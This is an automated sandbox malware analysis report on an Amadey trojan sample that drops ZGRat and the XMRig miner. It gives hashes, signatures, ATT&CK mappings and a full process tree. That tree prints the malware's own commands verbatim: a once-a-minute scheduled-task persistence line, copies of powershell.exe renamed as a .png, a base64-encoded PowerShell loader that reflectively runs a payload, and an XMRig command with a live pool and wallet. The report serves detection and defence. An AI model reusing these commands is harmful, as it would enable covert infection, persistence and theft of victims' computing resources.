amadey | bb150377b93d4df2a877a68e700490644290a0ea59001c189e55bbf62bad1e68

Analysis

max time kernel
148s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2023 03:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d182c5cc932fdf30690e58b1c7e297de.exe
Size

778KB
MD5

d182c5cc932fdf30690e58b1c7e297de
SHA1

249540ccad900d3cc6c5b2ccc9447d5ca895879d
SHA256

bb150377b93d4df2a877a68e700490644290a0ea59001c189e55bbf62bad1e68
SHA512

7038d3a737edd97fa9278c5c76df5e5cccfd0b6bc10cf76d422e0ec3b244519863d959b350dc3b8712203df6bf6f9f134db68b60545421bd6c65b83ec0aef380
SSDEEP

12288:6bgEa19Hi8mgRp0rAj67YdHZhvWvMS8jTRaFxnn4wGTl:zPmy0rm1XvWvt8jTw/0T

Score

10^/10

amadey xmrig zgrat miner rat trojan

Malware Config

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3520-82-0x0000028009B20000-0x0000028009C20000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3120-125-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-126-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-127-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-129-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-130-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-131-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-132-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-133-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-134-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-207-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/3120-208-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

d182c5cc932fdf30690e58b1c7e297de.exeUtsysc.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation	d182c5cc932fdf30690e58b1c7e297de.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation	Utsysc.exe

Executes dropped EXE 12 IoCs

Processes:

Utsysc.exeUtsysc.exeUtsysc.exeRsopprbwlid.exeRsopprbwlid.exeUtsysc.exeUtsysc.exeHResult.exeHResult.exeIntyweuri.pngUtsysc.exeUtsysc.exe

pid	process
404	Utsysc.exe
3412	Utsysc.exe
4240	Utsysc.exe
2700	Rsopprbwlid.exe
3520	Rsopprbwlid.exe
3128	Utsysc.exe
3992	Utsysc.exe
1156	HResult.exe
1704	HResult.exe
3776	Intyweuri.png
3696	Utsysc.exe
3360	Utsysc.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

d182c5cc932fdf30690e58b1c7e297de.exeUtsysc.exeRsopprbwlid.exeUtsysc.exeHResult.exeHResult.exeMSBuild.exeMSBuild.exeUtsysc.exe

description	pid	process	target process
PID 4764 set thread context of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 404 set thread context of 4240	404	Utsysc.exe	Utsysc.exe
PID 2700 set thread context of 3520	2700	Rsopprbwlid.exe	Rsopprbwlid.exe
PID 3128 set thread context of 3992	3128	Utsysc.exe	Utsysc.exe
PID 1156 set thread context of 1704	1156	HResult.exe	HResult.exe
PID 1704 set thread context of 4576	1704	HResult.exe	MSBuild.exe
PID 4576 set thread context of 1280	4576	MSBuild.exe	MSBuild.exe
PID 1280 set thread context of 3120	1280	MSBuild.exe	AddInProcess.exe
PID 3696 set thread context of 3360	3696	Utsysc.exe	Utsysc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

492 3776 WerFault.exe Intyweuri.png
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1772 schtasks.exe

pid	pid_target	process	target process
492	3776	WerFault.exe	Intyweuri.png

pid	process
1772	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d182c5cc932fdf30690e58b1c7e297de.exeUtsysc.exeRsopprbwlid.exeHResult.exeMSBuild.exeMSBuild.exeIntyweuri.png

pid	process
4764	d182c5cc932fdf30690e58b1c7e297de.exe
4764	d182c5cc932fdf30690e58b1c7e297de.exe
4764	d182c5cc932fdf30690e58b1c7e297de.exe
4764	d182c5cc932fdf30690e58b1c7e297de.exe
404	Utsysc.exe
404	Utsysc.exe
2700	Rsopprbwlid.exe
2700	Rsopprbwlid.exe
1156	HResult.exe
4576	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
3776	Intyweuri.png
3776	Intyweuri.png
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe
1280	MSBuild.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

pid	process
668

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

d182c5cc932fdf30690e58b1c7e297de.exeUtsysc.exeRsopprbwlid.exeRsopprbwlid.exeUtsysc.exeHResult.exeHResult.exeMSBuild.exeMSBuild.exeAddInProcess.exeIntyweuri.pngUtsysc.exe

description	pid	process
Token: SeDebugPrivilege	4764	d182c5cc932fdf30690e58b1c7e297de.exe
Token: SeDebugPrivilege	404	Utsysc.exe
Token: SeDebugPrivilege	2700	Rsopprbwlid.exe
Token: SeDebugPrivilege	3520	Rsopprbwlid.exe
Token: SeDebugPrivilege	3128	Utsysc.exe
Token: SeDebugPrivilege	1156	HResult.exe
Token: SeDebugPrivilege	1704	HResult.exe
Token: SeDebugPrivilege	4576	MSBuild.exe
Token: SeDebugPrivilege	1280	MSBuild.exe
Token: SeLockMemoryPrivilege	3120	AddInProcess.exe
Token: SeLockMemoryPrivilege	3120	AddInProcess.exe
Token: SeDebugPrivilege	3776	Intyweuri.png
Token: SeDebugPrivilege	3696	Utsysc.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

d182c5cc932fdf30690e58b1c7e297de.exeAddInProcess.exe

pid process

2300 d182c5cc932fdf30690e58b1c7e297de.exe
3120 AddInProcess.exe

pid	process
2300	d182c5cc932fdf30690e58b1c7e297de.exe
3120	AddInProcess.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d182c5cc932fdf30690e58b1c7e297de.exed182c5cc932fdf30690e58b1c7e297de.exeUtsysc.exeUtsysc.exeRsopprbwlid.exeUtsysc.exeHResult.exeHResult.exe

description	pid	process	target process
PID 4764 wrote to memory of 1988	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 1988	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 1988	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 3576	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 3576	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 3576	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 4764 wrote to memory of 2300	4764	d182c5cc932fdf30690e58b1c7e297de.exe	d182c5cc932fdf30690e58b1c7e297de.exe
PID 2300 wrote to memory of 404	2300	d182c5cc932fdf30690e58b1c7e297de.exe	Utsysc.exe
PID 2300 wrote to memory of 404	2300	d182c5cc932fdf30690e58b1c7e297de.exe	Utsysc.exe
PID 2300 wrote to memory of 404	2300	d182c5cc932fdf30690e58b1c7e297de.exe	Utsysc.exe
PID 404 wrote to memory of 3412	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 3412	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 3412	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 404 wrote to memory of 4240	404	Utsysc.exe	Utsysc.exe
PID 4240 wrote to memory of 1772	4240	Utsysc.exe	schtasks.exe
PID 4240 wrote to memory of 1772	4240	Utsysc.exe	schtasks.exe
PID 4240 wrote to memory of 1772	4240	Utsysc.exe	schtasks.exe
PID 4240 wrote to memory of 2700	4240	Utsysc.exe	Rsopprbwlid.exe
PID 4240 wrote to memory of 2700	4240	Utsysc.exe	Rsopprbwlid.exe
PID 2700 wrote to memory of 3520	2700	Rsopprbwlid.exe	Rsopprbwlid.exe
PID 2700 wrote to memory of 3520	2700	Rsopprbwlid.exe	Rsopprbwlid.exe
PID 2700 wrote to memory of 3520	2700	Rsopprbwlid.exe	Rsopprbwlid.exe
PID 2700 wrote to memory of 3520	2700	Rsopprbwlid.exe	Rsopprbwlid.exe
PID 2700 wrote to memory of 3520	2700	Rsopprbwlid.exe	Rsopprbwlid.exe
PID 2700 wrote to memory of 3520	2700	Rsopprbwlid.exe	Rsopprbwlid.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 3128 wrote to memory of 3992	3128	Utsysc.exe	Utsysc.exe
PID 1156 wrote to memory of 1704	1156	HResult.exe	HResult.exe
PID 1156 wrote to memory of 1704	1156	HResult.exe	HResult.exe
PID 1156 wrote to memory of 1704	1156	HResult.exe	HResult.exe
PID 1156 wrote to memory of 1704	1156	HResult.exe	HResult.exe
PID 1156 wrote to memory of 1704	1156	HResult.exe	HResult.exe
PID 1156 wrote to memory of 1704	1156	HResult.exe	HResult.exe
PID 1704 wrote to memory of 4576	1704	HResult.exe	MSBuild.exe
PID 1704 wrote to memory of 4576	1704	HResult.exe	MSBuild.exe
PID 1704 wrote to memory of 4576	1704	HResult.exe	MSBuild.exe
PID 1704 wrote to memory of 4576	1704	HResult.exe	MSBuild.exe
PID 1704 wrote to memory of 4576	1704	HResult.exe	MSBuild.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe
"C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4764

C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe
C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe
2⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe
C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe
2⤵
PID:3576

C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe
C:\Users\Admin\AppData\Local\Temp\d182c5cc932fdf30690e58b1c7e297de.exe
2⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2300

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
4⤵
- Executes dropped EXE
PID:3412

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4240

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe" /F
5⤵
- Creates scheduled task(s)
PID:1772

C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe
"C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700

C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe
C:\Users\Admin\AppData\Roaming\1000003000\Rsopprbwlid.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd" "
5⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
6⤵
PID:692

C:\Windows\SysWOW64\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Intyweuri.png
6⤵
- Enumerates system info in registry
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd"
6⤵
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
7⤵
PID:2184

C:\Windows\SysWOW64\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Intyweuri.png
7⤵
- Enumerates system info in registry
PID:4508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
7⤵
PID:3964

C:\Windows\SysWOW64\xcopy.exe
xcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd C:\Users\Admin\AppData\Local\Temp\Intyweuri.png.bat
7⤵
- Enumerates system info in registry
PID:4580

C:\Users\Admin\AppData\Local\Temp\Intyweuri.png
C:\Users\Admin\AppData\Local\Temp\Intyweuri.png -win 1 -enc JABTAGUAeABqAHcAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAVgB0AHgAdwB5AHEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUwBlAHgAagB3ACkAOwAkAEwAZABsAG8AeQBtAGYAcwB1AGYAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVgB0AHgAdwB5AHEAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAQgBzAG8AYgBnAGYAdgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABMAGQAbABvAHkAbQBmAHMAdQBmAGkALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEIAcwBvAGIAZwBmAHYALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEIAcwBvAGIAZwBmAHYALgBDAGwAbwBzAGUAKAApADsAJABMAGQAbABvAHkAbQBmAHMAdQBmAGkALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABWAHQAeAB3AHkAcQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABWAHQAeAB3AHkAcQApADsAIAAkAFQAZQBvAHIAdwBzAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAVgB0AHgAdwB5AHEAKQA7ACAAJABQAHgAYgBwAHgAYwBhAGcAYgBsAHUAIAA9ACAAJABUAGUAbwByAHcAcwBjAC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQATAB3AHAAbQBwAGwAIAA9ACAAJABQAHgAYgBwAHgAYwBhAGcAYgBsAHUALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 2208
8⤵
- Program crash
PID:492

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3128

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
2⤵
- Executes dropped EXE
PID:3992

C:\Users\Admin\AppData\Roaming\CspKeyContainerInfo\HResult.exe
C:\Users\Admin\AppData\Roaming\CspKeyContainerInfo\HResult.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156

C:\Users\Admin\AppData\Roaming\CspKeyContainerInfo\HResult.exe
C:\Users\Admin\AppData\Roaming\CspKeyContainerInfo\HResult.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3776 -ip 3776
1⤵
PID:2272

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ce3eb8f6b2\Utsysc.exe
2⤵
- Executes dropped EXE
PID:3360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HResult.exe.log

Filesize
1KB

MD5
9f5d0107d96d176b1ffcd5c7e7a42dc9

SHA1
de83788e2f18629555c42a3e6fada12f70457141

SHA256
d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

SHA512
86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MSBuild.exe.log

Filesize
1KB

MD5
9f5d0107d96d176b1ffcd5c7e7a42dc9

SHA1
de83788e2f18629555c42a3e6fada12f70457141

SHA256
d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

SHA512
86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Rsopprbwlid.exe.log

Filesize
1KB

MD5
9f5d0107d96d176b1ffcd5c7e7a42dc9

SHA1
de83788e2f18629555c42a3e6fada12f70457141

SHA256
d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

SHA512
86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Utsysc.exe.log

Filesize
1KB

MD5
f7047b64aa01f9d80c7a5e177ce2485c

SHA1
bab6005f4a30f12ee36b9abf6bfdfaa5411bbff8

SHA256
807356d2424d2d04f51ebd56f926d4d5a8318bc947c76569a3b5ca2c2f279915

SHA512
a9af5ace72eb66a6156a5d8764031cdc46feefffabb6898651f91a5af7f3bcef645e63e8d01ed35f1105e824d6830f6fa97e70adda2d5b148ffaff5f54ca248f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd

Filesize
897KB

MD5
5d475afe6b3c253e2bae4939c2fb5197

SHA1
774e8e6de49d1ea19bcc5361430ed4255e4c9ed2

SHA256
3cee20ad75be63c934e4a2dbfc724a0417291d6b2aae7cfc469bf61fb3eedeaf

SHA512
ca60dca1009075144ba4efd08a6075f1102d2ebc258d7b1358d747049cc5977e06adf348f68e6c925d9d27f1d4540c29199e63e5b7c43bf034528788a9ef148c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005021\Obemzhjhhdb.cmd

Filesize
897KB

MD5
5d475afe6b3c253e2bae4939c2fb5197

SHA1
774e8e6de49d1ea19bcc5361430ed4255e4c9ed2

SHA256
3cee20ad75be63c934e4a2dbfc724a0417291d6b2aae7cfc469bf61fb3eedeaf

SHA512
